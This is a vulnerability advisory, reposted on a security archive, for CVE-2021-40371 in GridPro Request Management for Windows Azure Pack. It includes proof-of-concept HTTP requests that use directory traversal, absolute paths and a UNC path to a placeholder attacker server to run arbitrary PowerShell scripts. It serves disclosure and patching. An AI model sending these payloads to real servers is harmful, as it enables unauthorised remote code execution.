what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal

GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal
Posted Oct 25, 2021
Authored by Giulian Guran

GridPro Request Management for Windows Azure Pack versions 2.0.7905 and below suffer from a traversal vulnerability that can allow for arbitrary execution of Powershell scripts.

tags | exploit, arbitrary
systems | windows
advisories | CVE-2021-40371
SHA-256 | 513dd9d3220aed0443768d76d63650e8af9dc973885a471803f11ba9b1c10d5c

GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal

Change Mirror Download
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ Certitude Securtiy Advisory - CSA-2021-003 ~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
PRODUCT : GridPro Request Management for Windows Azure Pack
VENDOR : GridPro Software
SEVERITY : Critical
AFFECTED VERSION : <=2.0.7905
IDENTIFIERS : CVE-2021-40371
PATCH VERSION : 2.0.7912
FOUND BY : Giulian Guran, Certitude Lab
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction
------------

"Windows Azure Pack delivers cloud capabilities to \[...\] on-premise
datacenter\[s\]. \[GridPro Request Management for Azure Pack\] add\[s\]
business processes, custom services, and customer support by integrating
Microsoft System Center Service Manager(TM) with Windows Azure Pack in a
unified cloud platform."

Source: https://www.gridprosoftware.com/products/requestmanagement/

Vulnerability Overview
----------------------

GridPro Request Management for Windows Azure Pack provides the ability to
execute PowerShell scripts. Through specific JSON parameters in HTTP requests
the plugin takes relative path locations as input to execute the desired
PowerShell scripts on the server. Through multiple techniques however, it is
possible to reach PowerShell scripts in other directories that may not be
intended to be executed by the application and can therefore lead to remote
code execution.

1. Through directory traversal attacks (e.g. usage of one or more `..\`) it
is possible to reach parent directories outside the original web directory
and execute arbitrary local scripts the web server account has access to.
2. Through fully qualified path names (e.g. `C:\Temp\script.ps1`) it is
possible to execute arbitrary local scripts the web server account has
access to, when the full path to the script is known.
3. By using UNC paths (e.g. `\\attacker-server\share$\script.ps1`) it is
possible to execute arbitrary PowerShell scripts from attacker-controlled
remote network shares.

Proof of Concept
----------------

Typical HTTP requests that execute PowerShell scripts on the server may look
as follows. It is important to note that adding a second backslash is
necessary to properly escape the backslash character:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"Directory1\\Directory2\\OriginalScript.ps1",[...]

By default, this relative path lies under the configured web server directory.
The possible attack types to gain access to PowerShell scripts in other
directories or shares are described in the following sections.

### 1. Directory Traversal

Using a directory traversal, it is possible to e.g. execute a local script
`C:\Temp\script.ps1`:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"..\\..\\..\\..\\..\\..\\Temp\\script.ps1",[...]

An attacker can exploit this by writing or uploading arbitrary PowerShell
scripts to the server and guessing their storage location to gain remote code
execution or by abusing existing PowerShell scripts on the server.

### 2. Direct Access Using The Fully Qualified Path Name

Using the fully qualified path name, it is again possible to e.g. execute the
local script `C:\Temp\script.ps1`:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"C:\\Temp\\script.ps1",[...]

An attacker can exploit this by writing or uploading arbitrary PowerShell
scripts to the server and knowing their exact storage location to gain remote
code execution or by abusing existing PowerShell scripts on the server.

### 3. Execution Of Attacker-Controlled Scripts From Network Shares

Using UNC paths, it is possible to e.g. execute arbitrary scripts from
attacker-controlled network shares:

POST /ServiceManagerTenant/GetVisibilityMap HTTP/2
Host: [vulnerableHost]
[...]
Connection: close

{"scriptName":"\\\\attacker-server\\share$\\script.ps1",[...]

An attacker can exploit this by preparing arbitrary PowerShell scripts on an
attacker-controlled network share and get them executed on the target server
to gain remote code execution.

Resolution
----------

GridPro fixed this vulnerability in GridPro Request Management for Windows
Azure Pack version 2.0.7912 and later.

Timeline
--------

---------------------------------------------------------------------------
Date Text
------------ --------------------------------------------------------------
2021-08-04 Sending vulnerability description and proof of concept to the
vendor

2021-08-17 GridPro team confirms issue being reproduced, fixed and
validated on their side

2021-08-18 GridPro team confirms a customer having installed the fix

2021-08-19 Coordination with vendor

2021-08-20 Coordination with vendor

2021-08-25 Coordination with vendor

2021-08-31 Coordination with vendor

2021-09-06 Vendor releases patch

2021-10-19 Coordination with vendor

2021-10-20 Public release of the advisory
---------------------------------------------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(c) 2021 Certitude Consulting GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close